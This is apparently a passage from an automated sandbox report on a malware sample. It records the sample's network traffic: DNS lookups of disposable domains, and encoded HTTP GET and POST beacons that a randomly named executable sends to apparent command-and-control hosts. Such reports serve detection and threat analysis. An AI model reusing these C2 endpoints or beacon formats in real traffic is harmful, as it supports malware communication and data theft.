                                                                    Dec 6, 2024 10:06:51.888916969 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:52.008780956 CET805002813.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:53.394331932 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:53.469347000 CET805002813.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:53.469424963 CET805002813.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:53.469513893 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:53.469558954 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:53.514267921 CET805002813.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:53.514326096 CET5002880192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:54.413155079 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:54.532892942 CET805002913.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:54.533010960 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:54.546828985 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:54.666582108 CET805002913.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:54.666642904 CET805002913.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:56.050565958 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:56.129877090 CET805002913.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:56.130142927 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:56.170958996 CET805002913.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:56.171058893 CET5002980192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:57.069494963 CET5003080192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:57.189270020 CET805003013.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:57.189445019 CET5003080192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:57.199027061 CET5003080192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:57.318840981 CET805003013.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:58.786322117 CET805003013.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:58.786391973 CET805003013.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:06:58.786529064 CET5003080192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:58.789247036 CET5003080192.168.2.613.228.81.39
                                                                    Dec 6, 2024 10:06:58.909128904 CET805003013.228.81.39192.168.2.6
                                                                    Dec 6, 2024 10:07:04.553575039 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:04.674529076 CET8050032199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:04.674662113 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:04.688956022 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:04.808768988 CET8050032199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:05.771228075 CET8050032199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:05.771253109 CET8050032199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:05.771267891 CET8050032199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:05.771307945 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:05.771348953 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:06.191526890 CET5003280192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:07.210221052 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:07.330718040 CET8050033199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:07.330842018 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:07.344991922 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:07.464833021 CET8050033199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:08.427506924 CET8050033199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:08.427552938 CET8050033199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:08.427567959 CET8050033199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:08.427625895 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:08.427680969 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:08.847738028 CET5003380192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:09.866189003 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:09.986088037 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:09.986201048 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:10.000368118 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:10.120387077 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:10.120417118 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:11.088685989 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:11.088732958 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:11.088758945 CET8050034199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:11.088788986 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:11.088821888 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:11.504095078 CET5003480192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:12.522609949 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:12.642445087 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:12.642564058 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:12.651443958 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:12.771542072 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:13.738337994 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:13.738439083 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:13.738555908 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:13.738565922 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:13.738612890 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:13.741234064 CET5003580192.168.2.6199.59.243.227
                                                                    Dec 6, 2024 10:07:13.860966921 CET8050035199.59.243.227192.168.2.6
                                                                    Dec 6, 2024 10:07:19.247258902 CET5003680192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:19.367103100 CET8050036172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:19.367258072 CET5003680192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:19.381354094 CET5003680192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:19.501211882 CET8050036172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:20.894778967 CET5003680192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:21.015413046 CET8050036172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:21.015516996 CET5003680192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:21.913388968 CET5003780192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:22.033219099 CET8050037172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:22.033361912 CET5003780192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:22.047568083 CET5003780192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:22.167741060 CET8050037172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:23.551498890 CET5003780192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:23.671881914 CET8050037172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:23.672009945 CET5003780192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:24.569679976 CET5003880192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:24.689623117 CET8050038172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:24.689821959 CET5003880192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:24.704016924 CET5003880192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:24.823868036 CET8050038172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:24.824016094 CET8050038172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:26.207724094 CET5003880192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:26.329489946 CET8050038172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:26.329722881 CET5003880192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:27.226130009 CET5003980192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:27.346095085 CET8050039172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:27.346169949 CET5003980192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:27.356547117 CET5003980192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:27.476320028 CET8050039172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:29.653884888 CET8050039172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:29.655311108 CET8050039172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:29.655369997 CET5003980192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:29.656641960 CET5003980192.168.2.6172.67.178.93
                                                                    Dec 6, 2024 10:07:29.776333094 CET8050039172.67.178.93192.168.2.6
                                                                    Dec 6, 2024 10:07:34.998825073 CET5004080192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:35.119071960 CET8050040172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:35.121223927 CET5004080192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:35.140233040 CET5004080192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:35.260011911 CET8050040172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:36.228521109 CET8050040172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:36.229080915 CET8050040172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:36.229146004 CET5004080192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:36.645265102 CET5004080192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:37.663769007 CET5004180192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:37.783821106 CET8050041172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:37.785691023 CET5004180192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:37.799776077 CET5004180192.168.2.6172.67.192.207
                                                                    Dec 6, 2024 10:07:37.919739962 CET8050041172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:38.894279003 CET8050041172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:38.894608021 CET8050041172.67.192.207192.168.2.6
                                                                    Dec 6, 2024 10:07:38.894685984 CET5004180192.168.2.6172.67.192.207

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 6, 2024 10:05:29.263572931 CET5906053192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:05:29.750101089 CET53590601.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:05:46.459527969 CET5955653192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:05:46.602241993 CET53595561.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:02.349880934 CET5827853192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:03.362207890 CET5827853192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:03.447992086 CET53582781.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:03.500432014 CET53582781.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:18.146966934 CET6293753192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:18.549081087 CET53629371.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:32.913201094 CET5463653192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:33.652059078 CET53546361.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:48.038472891 CET5275953192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:49.034908056 CET5275953192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:06:49.080565929 CET53527591.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:06:49.172219038 CET53527591.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:07:03.804383993 CET5564453192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:07:04.551013947 CET53556441.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:07:18.757397890 CET5457853192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:07:19.244645119 CET53545781.1.1.1192.168.2.6
                                                                    Dec 6, 2024 10:07:34.664074898 CET5552353192.168.2.61.1.1.1
                                                                    Dec 6, 2024 10:07:34.973643064 CET53555231.1.1.1192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 6, 2024 10:05:29.263572931 CET192.168.2.61.1.1.10xbd6dStandard query (0)www.qqa79.topA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:05:46.459527969 CET192.168.2.61.1.1.10xead6Standard query (0)www.gk88top.topA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:02.349880934 CET192.168.2.61.1.1.10xbb79Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:03.362207890 CET192.168.2.61.1.1.10xbb79Standard query (0)www.127358.winA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:18.146966934 CET192.168.2.61.1.1.10x4a92Standard query (0)www.infohive.websiteA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:32.913201094 CET192.168.2.61.1.1.10x446Standard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:48.038472891 CET192.168.2.61.1.1.10x338bStandard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.034908056 CET192.168.2.61.1.1.10x338bStandard query (0)www.muasamgiare.clickA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:03.804383993 CET192.168.2.61.1.1.10x5e4eStandard query (0)www.sfantulandrei.infoA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:18.757397890 CET192.168.2.61.1.1.10x6c4eStandard query (0)www.mffnow.infoA (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:34.664074898 CET192.168.2.61.1.1.10x5fd8Standard query (0)www.3kw40881107247y.clickA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 6, 2024 10:05:29.750101089 CET1.1.1.1192.168.2.60xbd6dNo error (0)www.qqa79.topqqa79.topCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 6, 2024 10:05:29.750101089 CET1.1.1.1192.168.2.60xbd6dNo error (0)qqa79.top38.47.233.21A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:05:46.602241993 CET1.1.1.1192.168.2.60xead6No error (0)www.gk88top.top104.21.7.187A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:05:46.602241993 CET1.1.1.1192.168.2.60xead6No error (0)www.gk88top.top172.67.137.47A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:03.447992086 CET1.1.1.1192.168.2.60xbb79No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:03.500432014 CET1.1.1.1192.168.2.60xbb79No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:18.549081087 CET1.1.1.1192.168.2.60x4a92No error (0)www.infohive.website66.29.149.46A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:33.652059078 CET1.1.1.1192.168.2.60x446No error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:33.652059078 CET1.1.1.1192.168.2.60x446No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.080565929 CET1.1.1.1192.168.2.60x338bNo error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.080565929 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.080565929 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.080565929 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.172219038 CET1.1.1.1192.168.2.60x338bNo error (0)www.muasamgiare.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.172219038 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.172219038 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:06:49.172219038 CET1.1.1.1192.168.2.60x338bNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:04.551013947 CET1.1.1.1192.168.2.60x5e4eNo error (0)www.sfantulandrei.info199.59.243.227A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:19.244645119 CET1.1.1.1192.168.2.60x6c4eNo error (0)www.mffnow.info172.67.178.93A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:19.244645119 CET1.1.1.1192.168.2.60x6c4eNo error (0)www.mffnow.info104.21.91.191A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:34.973643064 CET1.1.1.1192.168.2.60x5fd8No error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                                    Dec 6, 2024 10:07:34.973643064 CET1.1.1.1192.168.2.60x5fd8No error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.qqa79.top
                                                                    • www.gk88top.top
                                                                    • www.127358.win
                                                                    • www.infohive.website
                                                                    • www.sunnyz.store
                                                                    • www.muasamgiare.click
                                                                    • www.sfantulandrei.info
                                                                    • www.mffnow.info
                                                                    • www.3kw40881107247y.click

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.64985738.47.233.21805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:05:29.894571066 CET589OUTGET /t67p/?T2M=Y0Z0G&KxZ=7q1CHTqE7xA4Hb6UdPg4tnZI1eLzKcnykAAaTe838bXHA/ymbLu0PDKYOxDYCUf7LwmCLOma6qOkbyv7NKEXK+0pIYn6OsKXO6mwWbUGH3YR5hyu6M0h3PqYDwJCf+R1lkRh9UQ= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.qqa79.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Dec 6, 2024 10:05:31.407588959 CET691INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Fri, 06 Dec 2024 09:05:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 548
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649899104.21.7.187805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:05:46.753936052 CET851OUTPOST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 208
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 50 79 73 6d 45 4a 79 38 36 66 66 4e 4d 41 42 63 37 55 32 59 39 39 76 39 62 72 38 52 57 46 44 52 2f 5a 5a 39 4f 42 4e 6f 78 76 64 57 77 34 6f 73 33 72 37 4f 78 79 35 61 63 55 42 39 77 63 47 2f 41 73 4b 32 44 39 38 76 33 56 68 39 2b 42 52 52 6d 73 50 4b 46 68 55 56 7a 62 6d 30 41 59 4b 72 77 39 4f 62 31 4a 78 34 76 2b 4e 51 56 36 42 4f 56 6d 75 36 55 62 41 67 54 4e 6f 51 4c 70 63 58 37 77 36 44 70 6b 39 43 70 4b 67 71 49 74 53 35 67 4c 50 65 75 6f 38 44 48 43 4a 72 4e 65 76 67 36 65 35 66 45 7a 6d 62 6b 46 76 77 6b 37 6a 57 73 67 74 50 4c 70 5a 79 68 68 59 6b 55 62 4d 50
                                                                    Data Ascii: KxZ=y/nbf6lCzqeuPysmEJy86ffNMABc7U2Y99v9br8RWFDR/ZZ9OBNoxvdWw4os3r7Oxy5acUB9wcG/AsK2D98v3Vh9+BRRmsPKFhUVzbm0AYKrw9Ob1Jx4v+NQV6BOVmu6UbAgTNoQLpcX7w6Dpk9CpKgqItS5gLPeuo8DHCJrNevg6e5fEzmbkFvwk7jWsgtPLpZyhhYkUbMP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.649905104.21.7.187805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:05:49.421013117 CET875OUTPOST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 232
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                                    Data Raw: 4b 78 5a 3d 79 2f 6e 62 66 36 6c 43 7a 71 65 75 4a 53 63 6d 58 2b 6d 38 2f 2f 66 4f 44 67 42 63 75 6b 32 55 39 39 72 39 62 71 35 4f 57 78 76 52 2f 35 70 39 4e 45 74 6f 77 76 64 57 6c 49 6f 70 70 62 37 5a 78 79 30 76 63 57 56 39 77 63 53 2f 41 70 32 32 44 4d 38 73 32 46 68 37 67 68 52 54 72 4d 50 4b 46 68 55 56 7a 62 62 68 41 5a 69 72 77 75 47 62 30 72 4a 6e 69 65 4e 54 43 4b 42 4f 52 6d 75 32 55 62 42 33 54 50 4e 33 4c 72 30 58 37 78 71 44 75 33 6c 42 6e 36 67 6b 4c 64 53 79 75 35 2b 49 30 4c 39 7a 59 68 42 4e 56 5a 37 33 2f 6f 6b 46 59 41 6d 34 32 56 50 79 6b 35 37 6b 73 41 74 6c 4a 70 68 79 7a 32 55 44 62 76 70 73 4c 62 4f 36 62 57 6d 30 58 47 2b 75 71 4c 57 5a 73 58 33 36 6f 77 3d 3d
                                                                    Data Ascii: KxZ=y/nbf6lCzqeuJScmX+m8//fODgBcuk2U99r9bq5OWxvR/5p9NEtowvdWlIoppb7Zxy0vcWV9wcS/Ap22DM8s2Fh7ghRTrMPKFhUVzbbhAZirwuGb0rJnieNTCKBORmu2UbB3TPN3Lr0X7xqDu3lBn6gkLdSyu5+I0L9zYhBNVZ73/okFYAm42VPyk57ksAtlJphyz2UDbvpsLbO6bWm0XG+uqLWZsX36ow==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.649912104.21.7.187805000C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 6, 2024 10:05:52.076924086 CET1888OUTPOST /vjnn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Host: www.gk88top.top
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Content-Length: 1244
                                                                    Cache-Control: no-cache
                                                                    Origin: http://www.gk88top.top
                                                                    Referer: http://www.gk88top.top/vjnn/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
